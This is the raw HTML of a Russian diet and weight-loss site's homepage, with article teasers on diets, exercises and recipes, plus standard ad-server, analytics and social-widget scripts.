            <input type="submit" id="searchsubmit" value="" />

        </div>
        например: <a href="#" onclick="return insertText();">диета Дюкана</a>

        <script type="text/javascript">
            function insertText(){
                $("#s").val("диета Дюкана");
                return false;
            }
        </script>

    </form>
</noindex>
    </div>
    <p>
        <a href="/dieta-online" class="btn-go" style="display: block;">Подобрать диету онлайн</a>
    </p>
    <div class="post">
        <!--/* id1032_2_2_1_0_4 */-->
        <noindex>
            <script type='text/javascript'><!--//<![CDATA[
                var m3_u = (location.protocol=='https:'?'https://openx.ctlc.ru/www/delivery/ajs.php':'http://openx.ctlc.ru/www/delivery/ajs.php');
                var m3_r = Math.floor(Math.random()*99999999999);
                if (!document.MAX_used) document.MAX_used = ',';
                document.write ("<scr"+"ipt type='text/javascript' src='"+m3_u);
                document.write ("?zoneid=1805");
                document.write ('&amp;cb=' + m3_r);
                if (document.MAX_used != ',') document.write ("&amp;exclude=" + document.MAX_used);
                document.write (document.charset ? '&amp;charset='+document.charset : (document.characterSet ? '&amp;charset='+document.characterSet : ''));
                document.write ("&amp;loc=" + escape(window.location));
                if (document.referrer) document.write ("&amp;referer=" + escape(document.referrer));
                if (document.context) document.write ("&context=" + escape(document.context));
                if (document.mmm_fo) document.write ("&amp;mmm_fo=1");
                document.write ("'><\/scr"+"ipt>");
                //]]>--></script><noscript><a href='http://openx.ctlc.ru/www/delivery/ck.php?n=a7500426&amp;cb=INSERT_RANDOM_NUMBER_HERE' target='_blank'><img src='http://openx.ctlc.ru/www/delivery/avw.php?zoneid=1805&amp;cb=INSERT_RANDOM_NUMBER_HERE&amp;n=a7500426' border='0' alt='' /></a></noscript>
        </noindex>
    </div>
<script type="application/javascript">var zone253 = "#3e3953726aefcc32be1cf528c82a5624";var zone290 = "#f9250f0029624e98a33c1a8fda8742fa";var zone1138 = "#147c522009dfa360d2728b7decd16d3c";</script><!--    <div id="id10310_2_2_01" style="margin-top: 10px;">-->
    <div class="post" id="3e3953726aefcc32be1cf528c82a5624">
        <!--/* id10310_2_2_01 */-->
        <noindex>
            <script type='text/javascript'><!--//<![CDATA[
                var m3_u = (location.protocol == 'https:' ? 'https://openx.ctlc.ru/www/delivery/ajs.php' : 'http://openx.ctlc.ru/www/delivery/ajs.php');
                var m3_r = Math.floor(Math.random() * 99999999999);
                if (!document.MAX_used) document.MAX_used = ',';
                document.write("<scr" + "ipt type='text/javascript' src='" + m3_u);
                document.write("?zoneid=253");
                document.write('&cb=' + m3_r);
                if (document.MAX_used != ',') document.write("&exclude=" + document.MAX_used);
                document.write(document.charset ? '&charset=' + document.charset : (document.characterSet ? '&charset=' + document.characterSet : ''));
                document.write("&loc=" + escape(window.location));
                if (document.referrer) document.write("&referer=" + escape(document.referrer));
                if (document.context) document.write("&context=" + escape(document.context));
                if (document.mmm_fo) document.write("&mmm_fo=1");
                document.write("'><\/scr" + "ipt>");
                //]]>--></script>
            <noscript><a href='http://openx.ctlc.ru/www/delivery/ck.php?n=a3dbbb5c&cb=INSERT_RANDOM_NUMBER_HERE' target='_blank'><img src='http://openx.ctlc.ru/www/delivery/avw.php?zoneid=253&cb=INSERT_RANDOM_NUMBER_HERE&n=a3dbbb5c' border='0' alt=''/></a></noscript>
        </noindex>
    </div>
    <div class="blogs-block">

<!--        <span class="caption">Блоги экспертов</span>-->
<!--        <div class="element">-->
<!--            <a class="name" href="/category/grand-clinic">Сеть клиник эстетической медицины Grand clinic</a>-->
<!--        </div>-->
    </div>

    <div class="post">
        <!-- uSocial uLike informer -->
        <div class="uSocial-uLike-informer"
             data-pid="e7e15192da2e623f8ce1175601d7bed1"
             data-type="uLike-informer"
             data-period="curMonth"
             data-posts="5"
             data-options="rect,skin-light"
             data-width="auto"
             data-text="Интересные материалы появятся уже скоро! :)"></div>
        <!-- /uSocial uLike informer -->
    </div>

    <div class="lastnews-block news-block">
        <span class="caption">Последние статьи в разделе</span>
                    <div class="element clearfix">
                <img width="70" height="70" src="http://www.azbukadiet.ru/wp-content/uploads/2018/02/116-150x150.jpg" class="attachment-70x70 size-70x70 wp-post-image" alt="" />                <a href="http://www.azbukadiet.ru/2018/02/16/brazilskaya-dieta-xudeem-za-7-dnej.html" rel="bookmark">
                    Бразильская диета – худеем за 7 дней                </a>
            </div>
                    <div class="element clearfix">
                <img width="70" height="70" src="http://www.azbukadiet.ru/wp-content/uploads/2018/02/kak-prigotovit-ovsyanoblin-1-150x150.jpg" class="attachment-70x70 size-70x70 wp-post-image" alt="" />                <a href="http://www.azbukadiet.ru/2018/02/09/kak-prigotovit-ovsyanoblin-pp-recept-s-foto.html" rel="bookmark">
                    Как приготовить овсяноблин: ПП рецепт с фото                </a>
            </div>
                    <div class="element clearfix">
                <img width="70" height="70" src="http://www.azbukadiet.ru/wp-content/uploads/2018/01/stroim-pravilnye-otnosheniya-s-edoj-150x150.jpg" class="attachment-70x70 size-70x70 wp-post-image" alt="Строим правильные отношения с едой" />                <a href="http://www.azbukadiet.ru/2018/01/11/stroim-pravilnye-otnosheniya-s-edoj.html" rel="bookmark">
                    Строим правильные отношения с едой                </a>
            </div>
                    <div class="element clearfix">
                                <a href="http://www.azbukadiet.ru/2017/12/14/dieta-pri-zaporax-u-vzroslyx.html" rel="bookmark">
                    Диета при запорах у взрослых                </a>
            </div>
                    <div class="element clearfix">
                                <a href="http://www.azbukadiet.ru/2017/12/14/polza-i-vred-xalvy-dlya-organizma-cheloveka.html" rel="bookmark">
                    Польза и вред халвы для организма человека                </a>
            </div>
            </div>
    

<!-- 5fa75adf -->
<!-- 976bb48f -->

<script>var mt_cid = 41618844</script>
<script async="async" src="http://adcounter1.uptolike.ru/counter.js?sid=st4b7e02a8aeef85ec1c958224fa0793f428e56ecf" type="text/javascript"></script>
<!-- 5fa75adf -->

    <div id="linker">
    <!-- thisIs linker -->    </div>

        <div class="fixed-block" style="width: 300px;">

        <script type='text/javascript'><!--//<![CDATA[
            var m3_u = (location.protocol=='https:'?'https://openx.ctlc.ru/www/delivery/ajs.php':'http://openx.ctlc.ru/www/delivery/ajs.php');
            var m3_r = Math.floor(Math.random()*99999999999);
            if (!document.MAX_used) document.MAX_used = ',';
            document.write ("<scr"+"ipt type='text/javascript' src='"+m3_u);
            document.write ("?zoneid=1806");
            document.write ('&amp;cb=' + m3_r);
            if (document.MAX_used != ',') document.write ("&amp;exclude=" + document.MAX_used);
            document.write (document.charset ? '&amp;charset='+document.charset : (document.characterSet ? '&amp;charset='+document.characterSet : ''));
            document.write ("&amp;loc=" + escape(window.location));
            if (document.referrer) document.write ("&amp;referer=" + escape(document.referrer));
            if (document.context) document.write ("&context=" + escape(document.context));
            if (document.mmm_fo) document.write ("&amp;mmm_fo=1");
            document.write ("'><\/scr"+"ipt>");
            //]]>--></script><noscript><a href='http://openx.ctlc.ru/www/delivery/ck.php?n=aa7339a5&amp;cb=INSERT_RANDOM_NUMBER_HERE' target='_blank'><img src='http://openx.ctlc.ru/www/delivery/avw.php?zoneid=1806&amp;cb=INSERT_RANDOM_NUMBER_HERE&amp;n=aa7339a5' border='0' alt='' /></a></noscript>
        <script type='text/javascript'><!--//<![CDATA[
            var m3_u = (location.protocol=='https:'?'https://openx.ctlc.ru/www/delivery/ajs.php':'http://openx.ctlc.ru/www/delivery/ajs.php');
            var m3_r = Math.floor(Math.random()*99999999999);
            if (!document.MAX_used) document.MAX_used = ',';
            document.write ("<scr"+"ipt type='text/javascript' src='"+m3_u);
            document.write ("?zoneid=1721");
            document.write ('&amp;cb=' + m3_r);
            if (document.MAX_used != ',') document.write ("&amp;exclude=" + document.MAX_used);
            document.write (document.charset ? '&amp;charset='+document.charset : (document.characterSet ? '&amp;charset='+document.characterSet : ''));
            document.write ("&amp;loc=" + escape(window.location));
            if (document.referrer) document.write ("&amp;referer=" + escape(document.referrer));
            if (document.context) document.write ("&context=" + escape(document.context));
            if (document.mmm_fo) document.write ("&amp;mmm_fo=1");
            document.write ("'><\/scr"+"ipt>");
            //]]>--></script><noscript><a href='http://openx.ctlc.ru/www/delivery/ck.php?n=a2c1fdc5&amp;cb=INSERT_RANDOM_NUMBER_HERE' target='_blank'><img src='http://openx.ctlc.ru/www/delivery/avw.php?zoneid=1721&amp;cb=INSERT_RANDOM_NUMBER_HERE&amp;n=a2c1fdc5' border='0' alt='' /></a></noscript>

            <!-- Google Tag Manager -->
            <noscript><iframe src="//www.googletagmanager.com/ns.html?id=GTM-WWBK24"
            height="0" width="0" style="display:none;visibility:hidden"></iframe></noscript>
            <script>(function(w,d,s,l,i){w[l]=w[l]||[];w[l].push({'gtm.start':
            new Date().getTime(),event:'gtm.js'});var f=d.getElementsByTagName(s)[0],
            j=d.createElement(s),dl=l!='dataLayer'?'&l='+l:'';j.async=true;j.src=
            '//www.googletagmanager.com/gtm.js?id='+i+dl;f.parentNode.insertBefore(j,f);
            })(window,document,'script','dataLayer','GTM-WWBK24');</script>
            <!-- End Google Tag Manager -->
    </div>
    
</aside>
<aside class="left-layer">



</aside>

<!-- // sb -->

<div class="center-layer homepage">


<index>
    <h1 class="dotted"><span>Новое</span></h1>
            <div class="new_article clearfix">
            <div class="new_article_img"><img src="http://www.azbukadiet.ru/wp-content/uploads/2018/03/1-18-600x400.jpg"></div>
            <h2 class="new_article_title"><a href="http://www.azbukadiet.ru/2018/03/19/bez-vreda-dlya-zdorovya-pravila-bezopasnosti-pri-pohudenii.html">Без вреда для здоровья: правила безопасности при похудении</a></h2>
            <div class="new_article_nav">
                    <span class="new_article_category">
                    <a href="http://www.azbukadiet.ru/category/news" rel="category tag">Новости</a></span> | <span class="new_article_comments">
                    <a href="http://www.azbukadiet.ru/2018/03/19/bez-vreda-dlya-zdorovya-pravila-bezopasnosti-pri-pohudenii.html#respond" class="category" >Нет отзывов</a>                    </span>
            </div>
            <div class="new_article_anons"><p>Стройность – это прямой путь к здоровью, но достигать ее нужно правильно, иначе не избежать обратного эффекта. Десятка правил похудения, которая сделает процесс быстрым и безопасным, должна стать прямым руководством к действию для каждого желающего сбросить килограммы. Источник фото: pixabay.com Красота невозможна для нездорового тела, и если достичь желаемых форм в ущерб самочувствию, то можно [&hellip;]</p>
</div>
            <div class="new_article_more"><a href="http://www.azbukadiet.ru/2018/03/19/bez-vreda-dlya-zdorovya-pravila-bezopasnosti-pri-pohudenii.html">Читать далее →</a></div>
        </div>
            <div class="new_article clearfix">
            <div class="new_article_img"><img src="http://www.azbukadiet.ru/wp-content/uploads/2018/03/1-17-600x400.jpg"></div>
            <h2 class="new_article_title"><a href="http://www.azbukadiet.ru/2018/03/19/byudzhetnoe-pohudenie-eto-realno.html">Бюджетное похудение – это реально!</a></h2>
            <div class="new_article_nav">
                    <span class="new_article_category">
                    <a href="http://www.azbukadiet.ru/category/news" rel="category tag">Новости</a></span> | <span class="new_article_comments">
                    <a href="http://www.azbukadiet.ru/2018/03/19/byudzhetnoe-pohudenie-eto-realno.html#respond" class="category" >Нет отзывов</a>                    </span>
            </div>
            <div class="new_article_anons"><p>Одно из главных оправданий неправильного питания – это то, что ПП дорого. Так ли это на самом деле, или просто не все умеют готовить здоровую пищу? Источник фото: pixabay.com Речь не столько о трансжирах, усилителях вкуса и прочих вредностях, сколько о неправильном сочетании стандартных белков, жиров и углеводов, а также любви к рафинированным сахарам. Нередко [&hellip;]</p>
</div>
            <div class="new_article_more"><a href="http://www.azbukadiet.ru/2018/03/19/byudzhetnoe-pohudenie-eto-realno.html">Читать далее →</a></div>
        </div>
            <div class="new_article clearfix">
            <div class="new_article_img"><img src="http://www.azbukadiet.ru/wp-content/uploads/2018/03/111-600x400.jpeg"></div>
            <h2 class="new_article_title"><a href="http://www.azbukadiet.ru/2018/03/19/kompleks-uprazhneniy-dlya-pohudeniya-zhivota-bokov-i-beder.html">Комплекс упражнений для похудения живота, боков и бедер</a></h2>
            <div class="new_article_nav">
                    <span class="new_article_category">
                    <a href="http://www.azbukadiet.ru/category/news" rel="category tag">Новости</a></span> | <span class="new_article_comments">
                    <a href="http://www.azbukadiet.ru/2018/03/19/kompleks-uprazhneniy-dlya-pohudeniya-zhivota-bokov-i-beder.html#respond" class="category" >Нет отзывов</a>                    </span>
            </div>
            <div class="new_article_anons"><p>Данный комплекс направлен на похудение боков, формирование стройных бедер и плоского живота. С помощью предложенных упражнений вы не только получите фигуру своей мечты, но и активизируете работу органов брюшной полости, разовьете выносливость и получите заряд энергии. Источник фото: pexels.com Каждое упражнение необходимо выполнять по 1 минуте, по 2 подхода. Уже через неделю занятий вы увидите [&hellip;]</p>
</div>
            <div class="new_article_more"><a href="http://www.azbukadiet.ru/2018/03/19/kompleks-uprazhneniy-dlya-pohudeniya-zhivota-bokov-i-beder.html">Читать далее →</a></div>
        </div>
            <div class="new_article clearfix">
            <div class="new_article_img"><img src="http://www.azbukadiet.ru/wp-content/uploads/2018/03/111-2-600x338.jpg"></div>
            <h2 class="new_article_title"><a href="http://www.azbukadiet.ru/2018/03/19/dieticheskie-salaty-na-skoruyu-ruku-3-retsepta-dlya-pohudeniya.html">Диетические салаты на скорую руку – 3 рецепта для похудения</a></h2>
            <div class="new_article_nav">
                    <span class="new_article_category">
                    <a href="http://www.azbukadiet.ru/category/news" rel="category tag">Новости</a></span> | <span class="new_article_comments">
                    <a href="http://www.azbukadiet.ru/2018/03/19/dieticheskie-salaty-na-skoruyu-ruku-3-retsepta-dlya-pohudeniya.html#respond" class="category" >Нет отзывов</a>                    </span>
            </div>
            <div class="new_article_anons"><p>Здоровое питание может предотвратить развитие многих заболеваний, увеличить продолжительность жизни и улучшить физические данные. Однако современный ритм жизни оставляет мало времени для приготовления пищи. Источник фото: pixabay.com Наиболее подходящим блюдом для людей, стремящихся похудеть и поправить свое здоровье, являются диетические салаты. Далее мы рассмотрим 3 рецепта на скорую руку. No related posts.</p>
</div>
            <div class="new_article_more"><a href="http://www.azbukadiet.ru/2018/03/19/dieticheskie-salaty-na-skoruyu-ruku-3-retsepta-dlya-pohudeniya.html">Читать далее →</a></div>
        </div>
            <div class="new_article clearfix">
            <div class="new_article_img"><img src="http://www.azbukadiet.ru/wp-content/uploads/2018/03/1-7-600x448.jpg"></div>
            <h2 class="new_article_title"><a href="http://www.azbukadiet.ru/2018/03/18/trenirovki-po-sisteme-tabata-dlya-pohu.html">Тренировки по системе Табата для похудения</a></h2>
            <div class="new_article_nav">
                    <span class="new_article_category">
                    <a href="http://www.azbukadiet.ru/category/news" rel="category tag">Новости</a></span> | <span class="new_article_comments">
                    <a href="http://www.azbukadiet.ru/2018/03/18/trenirovki-po-sisteme-tabata-dlya-pohu.html#respond" class="category" >Нет отзывов</a>                    </span>
            </div>
            <div class="new_article_anons"><p>Методика Табата является одной из самых действенных разновидностей интервального тренинга. Она дает возможность избавиться от 3-4 кг за неделю. Источник фото: pxhere.com Тренировка по методике Табата состоит из четырех раундов, длящихся по 4 минуты. На протяжении 4-х минут человек чередует нагрузки и передышку. Первые 40 секунд необходимо делать упражнения в быстром темпе. Затем следует десятисекундная [&hellip;]</p>
</div>
            <div class="new_article_more"><a href="http://www.azbukadiet.ru/2018/03/18/trenirovki-po-sisteme-tabata-dlya-pohu.html">Читать далее →</a></div>
        </div>
            <div class="new_article clearfix">
            <div class="new_article_img"><img src="http://www.azbukadiet.ru/wp-content/uploads/2018/03/limfodrenazhnyy-massazh-vokrug-glaz-1-600x405.jpg"></div>
            <h2 class="new_article_title"><a href="http://www.azbukadiet.ru/2018/03/18/limfodrenazhnyy-massazh-vokrug-glaz-ubiraem-oteki.html">Лимфодренажный массаж вокруг глаз: убираем отеки</a></h2>
            <div class="new_article_nav">
                    <span class="new_article_category">
                    <a href="http://www.azbukadiet.ru/category/omolozhenie-organizma" rel="category tag">Омоложение организма</a></span> | <span class="new_article_comments">
                    <a href="http://www.azbukadiet.ru/2018/03/18/limfodrenazhnyy-massazh-vokrug-glaz-ubiraem-oteki.html#respond" class="category" >Нет отзывов</a>                    </span>
            </div>
            <div class="new_article_anons"><p>Мешки под глазами и припухлости век с возрастом появляются всё чаще. Быстро избавиться от отеков под глазами помогает лимфодренажный массаж лица. Мешки под глазами часто наблюдаются у людей в возрасте, они портят внешность, старят лицо, делают его усталым и одутловатым. Так почему бы не избавиться от проблемы, если это настолько просто и легко осуществимо в [&hellip;]</p>
</div>
            <div class="new_article_more"><a href="http://www.azbukadiet.ru/2018/03/18/limfodrenazhnyy-massazh-vokrug-glaz-ubiraem-oteki.html">Читать далее →</a></div>
        </div>
    
    <p class="text-center"><a href="http://www.azbukadiet.ru/about" class="btn-go">Все новые статьи</a></p>

    
    <h1 class="dotted"><span>Популярное</span></h1>
    <div class="clearfix">
    
    <div class="popular_article wide">
        <div class="popular_article_image"><img src="http://www.azbukadiet.ru/wp-content/uploads/2008/05/grechnevo-kefirnaya-dieta-150x150.jpg"></div>
        <div class="popular_article_bottom">
            <a href="http://www.azbukadiet.ru/2008/05/05/grechnevo-kefirnaya-dieta.html" class="popular_article_title">Гречневая диета – худейте легко благодаря кефиру и гречке!</a>
            <div class="popular_article_nav">
                <span class="popular_article_rubric">
                    <a href="http://www.azbukadiet.ru/category/diety" rel="category tag">Диеты</a>, <a href="http://www.azbukadiet.ru/category/diety/zlakovaya" rel="category tag">Злаковые диеты</a>, <a href="http://www.azbukadiet.ru/category/diety/monodiety" rel="category tag">Монодиеты</a>, <a href="http://www.azbukadiet.ru/category/diety/ochishhayushhie-diety" rel="category tag">Очищающие диеты</a></span> | <span class="popular_article_comments">
                    <a href="http://www.azbukadiet.ru/2008/05/05/grechnevo-kefirnaya-dieta.html#comments" class="category" >1&nbsp;625 комментариев</a>                </span>
            </div>
        </div>
    </div>
                <div class="popular_article padding clearfix">
                <div class="popular_article_image"><img src="http://www.azbukadiet.ru/wp-content/uploads/2011/08/prav-pitanie-menu.jpg"></div>
                <a href="http://www.azbukadiet.ru/2011/08/01/pravilnoe-pitanie-dlya-poxudeniya.html" class="popular_article_title">Правильное питание для похудения</a>

                <div class="popular_article_anons"><p>Наверное, в современном мире нет человека, который бы не слышал о том, что худея, надо питаться правильно. К примеру, многие не могут ответить, чем нужно завтракать, чтобы похудеть и не навредить при этом организму. Проблема заключается в том, что понятие “правильное питание&#187; имеет очень разное содержание. Одни говорят, мясо – яд, другие демонизируют картошку, помидоры [&hellip;]</p>
</div>
                <div class="popular_article_nav">
                    <span class="popular_article_rubric">
                        <a href="http://www.azbukadiet.ru/category/poxudenie" rel="category tag">Похудение</a>, <a href="http://www.azbukadiet.ru/category/zdorovoe-pitanie/principy" rel="category tag">Принципы питания</a></span> | <span class="popular_article_comments">
                        <a href="http://www.azbukadiet.ru/2011/08/01/pravilnoe-pitanie-dlya-poxudeniya.html#comments" class="category" >435 комментариев</a>                    </span>
                </div>
            </div>
                    <div class="popular_article padding clearfix">
                <div class="popular_article_image"><img src="http://www.azbukadiet.ru/wp-content/uploads/2012/11/uprazhneniya-dlya-szhiganiya-zhira-na-zhivote.jpg"></div>
                <a href="http://www.azbukadiet.ru/2012/11/12/uprazhneniya-dlya-szhiganiya-zhira-na-zhivote.html" class="popular_article_title">Упражнения для живота</a>

                <div class="popular_article_anons"><p>Маленький животик у женщин считается вполне нормальным явлением, даже у стройных девушек. Так наше тело защищает репродуктивные органы, и готовится к будущему материнству. Но что, если детей мы пока не планируем, а подкожный жир на животе, особенно жир внизу живота, «портит весь вид»? No related posts.</p>
</div>
                <div class="popular_article_nav">
                    <span class="popular_article_rubric">
                        <a href="http://www.azbukadiet.ru/category/fitnes/uprazhneniya-dlya-poxudeniya" rel="category tag">Упражнения для похудения</a></span> | <span class="popular_article_comments">
                        <a href="http://www.azbukadiet.ru/2012/11/12/uprazhneniya-dlya-szhiganiya-zhira-na-zhivote.html#comments" class="category" >324 комментария</a>                    </span>
                </div>
            </div>
            </div>
</index>
        
    <!-- tns-counter.ru -->
    <script type="text/javascript">
        (function(win, doc, cb){
            (win[cb] = win[cb] || []).push(function() {
                try {
                    tnsCounterCtlc_ru = new TNS.TnsCounter({
                        'account':'ctlc_ru',
                        'tmsec': 'azbukadiet_total'
                    });
                } catch(e){}
            });

            var tnsscript = doc.createElement('script');
            tnsscript.type = 'text/javascript';
            tnsscript.async = true;
            tnsscript.src = ('https:' == doc.location.protocol ? 'https:' : 'http:') + '//www.tns-counter.ru/tcounter.js';
            var s = doc.getElementsByTagName('script')[0];
            s.parentNode.insertBefore(tnsscript, s);
        })(window, this.document,'tnscounter_callback');
    </script>
    <noscript>
        <img src="//www.tns-counter.ru/V13a****ctlc_ru/ru/UTF-8/tmsec=azbukadiet_total/" width="0" height="0" alt="" />
    </noscript>
    <!--/ tns-counter.ru -->

    <br>

        <div class="mnu-block-in">
        <div class="soc_links_footer">
            <div class="vk">
                <!-- VK Widget -->
                <div id="vk_groups"></div>
                <script type="text/javascript">
                    VK.Widgets.Group("vk_groups", {mode: 0, width: "300", height: "285"}, 51092423);
                </script>
            </div>
            <div class="fb">
                <div class="fb-page"
                     data-href="https://www.facebook.com/Azbuka-Diet-200490463850943/"
                     data-tabs="timeline"
                     data-width="300"
                     data-height="285"
                     data-small-header="false"
                     data-adapt-container-width="true"
                     data-hide-cover="false"
                     data-show-facepile="true">
                    <blockquote cite="https://www.facebook.com/Azbuka-Diet-200490463850943/" class="fb-xfbml-parse-ignore"><a href="https://www.facebook.com/Azbuka-Diet-200490463850943/">Azbuka Diet</a></blockquote></div>
            </div>
            <div class="ok">
                <div id="ok_group_widget"></div>
                <script>
                    !function (d, id, did, st) {
                        var js = d.createElement("script");
                        js.src = "https://connect.ok.ru/connect.js";
                        js.onload = js.onreadystatechange = function () {
                            if (!this.readyState || this.readyState == "loaded" || this.readyState == "complete") {
                                if (!this.executed) {
                                    this.executed = true;
                                    setTimeout(function () {
                                        OK.CONNECT.insertGroupWidget(id,did,st);
                                    }, 0);
                                }
                            }}
                        d.documentElement.appendChild(js);
                    }(document,"ok_group_widget","53779017564359    ",'{"width":300,"height":285}');
                </script>
            </div>
        </div>
        <div class="links_footer">



            <div class="column_footer">
                <div class="title_footer">Диеты</div>
                <ul class ="ul_footer">
                    <li><a href="http://www.azbukadiet.ru/2008/05/05/grechnevo-kefirnaya-dieta.html">Гречневая диета</a></li>
                    <li><a href="http://azbukadiet.ru/2012/04/02/dieta-6-lepestkov.html">Диета 6 лепестков</a></li>
                    <li><a href="http://www.azbukadiet.ru/2011/07/03/dieta-dyukana.html">Диета Дюкана</a></li>
                    <li><a href="http://www.azbukadiet.ru/2010/12/02/dieta-malyshevoj.html">Диета Елены Малышевой</a></li>
                    <li><a href="http://www.azbukadiet.ru/2012/04/18/dieta-lyubimaya.html">Любимая диета</a></li>
                </ul>
            </div>
            <div class="column_footer">
                <div class="title_footer">Здоровое питание</div>
                    <ul class ="ul_footer">
                        <li><a href="http://www.azbukadiet.ru/2012/05/14/spisok-belkovyx-produktov.html">Список белковых продуктов</a></li>
                        <li><a href="http://www.azbukadiet.ru/2012/07/15/kak-varit-perlovuyu-kashu.html">Как варить перловку</a></li>
                        <li><a href="http://www.azbukadiet.ru/2012/03/28/samye-nizkokalorijnye-produkty-pitaniya.html">Низкокалорийные продукты</a></li>
                        <li><a href="http://www.azbukadiet.ru/2011/12/14/menyu-na-nedelyu-pravilnoe-pitanie-dlya-zhenshhin.html">Меню правильного питания</a></li>
                        <li><a href="http://www.azbukadiet.ru/2013/02/25/pravilnoe-pitanie-menyu-dlya-poxudeniya.html">Меню для похудения на неделю</a></li>
                    </ul>
            </div>
            <div class="column_footer">
                <div class="title_footer">Фитнес</div>
                    <ul class ="ul_footer">
                        <li><a href="http://www.azbukadiet.ru/2012/11/12/uprazhneniya-dlya-szhiganiya-zhira-na-zhivote.html">Как убрать жир с живота</a></li>
                        <li><a href="http://www.azbukadiet.ru/2011/04/11/pravilno-kachat-press.html">Как правильно качать пресс</a></li>
                        <li><a href="http://www.azbukadiet.ru/2013/03/01/video-uprazhneniya-dlya-poxudeniya-zhivota-i-bokov.html">Упражнения для похудения живота и боков</a></li>
                        <li><a href="http://www.azbukadiet.ru/2012/02/15/uprazhneniya-dlya-poxudeniya-ruk.html">Упражнения для похудения рук</a></li>
                        <li><a href="http://www.azbukadiet.ru/2016/12/22/kak-nakachat-popu-za-nedelyu.html">Как накачать попу в домашних условиях</a></li>
                </ul>
            </div>
            <div class="column_footer">
                <div class="title_footer">Полезные вещества</div>
                    <ul class ="ul_footer">
                        <li><a href="http://www.azbukadiet.ru/2011/07/30/l-carnitine.html">Л-карнитин</a></li>
                        <li><a href="http://www.azbukadiet.ru/2013/02/27/reduksin-lajt.html">Редуксин Лайт</a></li>
                        <li><a href="http://www.azbukadiet.ru/2013/08/21/kak-prinimat-preparat-fluoksetin-dlya-poxudeniya.html">Флуоксетин для похудения</a></li>
                        <li><a href="http://www.azbukadiet.ru/2011/06/24/zhiroszhigateli-dlya-zhenshhin.html">Жиросжигатели для похудения женщин</a></li>
                        <li><a href="http://www.azbukadiet.ru/2014/09/17/preparat-polisorb-dlya-poxudeniya.html">Полисорб для похудения</a></li>
                </ul>
            </div>
            <div class="column_footer">
                <div class="title_footer">Похудение и красота</div>
                    <ul class ="ul_footer">
                        <li><a href="http://www.azbukadiet.ru/2011/08/01/pravilnoe-pitanie-dlya-poxudeniya.html">Правильное питание для похудения</a></li>
                        <li><a href="http://www.azbukadiet.ru/2013/12/11/pishhevaya-plenka-dlya-poxudeniya-otzyvy.html">Пищевая пленка для похудения</a></li>
                        <li><a href="http://www.azbukadiet.ru/2012/09/06/dush-sharko-pokazaniya-protivopokazaniya.html">Душ Шарко</a></li>
                        <li><a href="http://www.azbukadiet.ru/2012/10/24/kak-izbavitsya-ot-otekov.html">Как избавиться от отеков</a></li>
                        <li><a href="http://www.azbukadiet.ru/2014/12/17/semena-lna-dlya-poxudeniya-otzyvy-rezultaty.html">Семена льна для похудения</a></li>
                </ul>
            </div>
            <div class="column_footer">
                <div class="title_footer">Раздел для мужчин</div>
                    <ul class ="ul_footer">
                        <li><a href="http://www.azbukadiet.ru/2012/09/12/kak-nabrat-ves-muzhchine.html">Как набрать вес мужчине</a></li>
                        <li><a href="http://www.azbukadiet.ru/2016/05/20/chto-takoe-sushka-tela.html">Что такое сушка тела</a></li>
                        <li><a href="http://www.azbukadiet.ru/2014/11/19/pivnye-drozhzhi-dlya-nabora-vesa.html">Пивные дрожжи для набора веса</a></li>
                        <li><a href="http://www.azbukadiet.ru/2014/11/19/gejner-dlya-nabora-massy.html">Гейнеры для набора массы</a></li>
                        <li><a href="http://www.azbukadiet.ru/2014/11/19/kak-ubrat-pivnoj-zhivot-muzhchine.html">Как убрать пивной живот</a></li>
                </ul>
            </div>
            <!--div class="column_footer">
                <div class="title_footer">Статьи</div>
                    <ul class ="ul_footer">
                        <li><a href="/category/novosti-dietologii">Новости диетологии</a></li>
                        <li><a href="/category/kolonka_redaktora">Колонка редактора</a></li>
                        <li><a href="/category/istorii-chitatelej">Истории похудения</a></li>
                        <li><a href="/category/istorii-chitatelej/celebrity">Из жизни знаменитостей</a></li>
                       <li><a href="/about">Содержание</a></li>
                    </ul>
            </div-->
            
        </div>
        </div>
            <div id="cookie" style="width: 750px; margin: 0 auto; clear:left;">
            <noindex>
                <div class="footer-ads">
                    <a href="http://wp-media.ru/women.html" target="_blank">Реклама на сайте</a> | <a href="?gomobile">Мобильная версия</a>
                </div>
                Сайт использует файлы
                <a href="http://wp-media.ru/cookie?a3a4fd7b667c371a0946ecda635803c6" target="_blank" rel="nofollow">
                    cookie
                </a>.
                Продолжая просмотр сайта, вы соглашаетесь с использованием файлов cookie.
            </noindex>
            </div>
<script type="text/javascript" src="https://yastatic.net/jquery/2.1.4/jquery.min.js"></script>
    <!-- мед виджет -->
<script type='text/javascript'><!--//<![CDATA[
    var m3_u = (location.protocol=='https:'?'https://openx.ctlc.ru/www/delivery/ajs.php':'http://openx.ctlc.ru/www/delivery/ajs.php');
    var m3_r = Math.floor(Math.random()*99999999999);
    if (!document.MAX_used) document.MAX_used = ',';
    document.write ("<scr"+"ipt type='text/javascript' src='"+m3_u);
    document.write ("?zoneid=1398");
    document.write ('&cb=' + m3_r);
    if (document.MAX_used != ',') document.write ("&exclude=" + document.MAX_used);
    document.write (document.charset ? '&charset='+document.charset : (document.characterSet ? '&charset='+document.characterSet : ''));
    document.write ("&loc=" + escape(window.location));
    if (document.referrer) document.write ("&referer=" + escape(document.referrer));
    if (document.context) document.write ("&context=" + escape(document.context));
    if (document.mmm_fo) document.write ("&mmm_fo=1");
    document.write ("'><\/scr"+"ipt>");
    //]]>--></script><noscript><a href='http://openx.ctlc.ru/www/delivery/ck.php?n=a74034f4&cb=INSERT_RANDOM_NUMBER_HERE' target='_blank'><img src='http://openx.ctlc.ru/www/delivery/avw.php?zoneid=1398&cb=INSERT_RANDOM_NUMBER_HERE&n=a74034f4' border='0' alt='' /></a></noscript>
<!-- /мед виджет -->

    <!-- tns-counter.ru -->
    <script type="text/javascript">
        (function(win, doc, cb){
            (win[cb] = win[cb] || []).push(function() {
                try {
                    tnsCounterWpmedia_ru = new TNS.TnsCounter({
                        'account':'wpmedia_ru',
                        'tmsec': 'azbukadiet_total'
                    });
                } catch(e){}
            });

            var tnsscript = doc.createElement('script');
            tnsscript.type = 'text/javascript';
            tnsscript.async = true;
            tnsscript.src = ('https:' == doc.location.protocol ? 'https:' : 'http:') +
                '//www.tns-counter.ru/tcounter.js';
            var s = doc.getElementsByTagName('script')[0];
            s.parentNode.insertBefore(tnsscript, s);
        })(window, this.document,'tnscounter_callback');
    </script>
    <noscript>
        <img src="//www.tns-counter.ru/V13a****wpmedia_ru/ru/UTF-8/tmsec=azbukadiet_total/" width="0" height="0" alt="" />
    </noscript>
    <!--/ tns-counter.ru -->

    <div style="padding-top: 20px; text-align: center">
        <noindex>
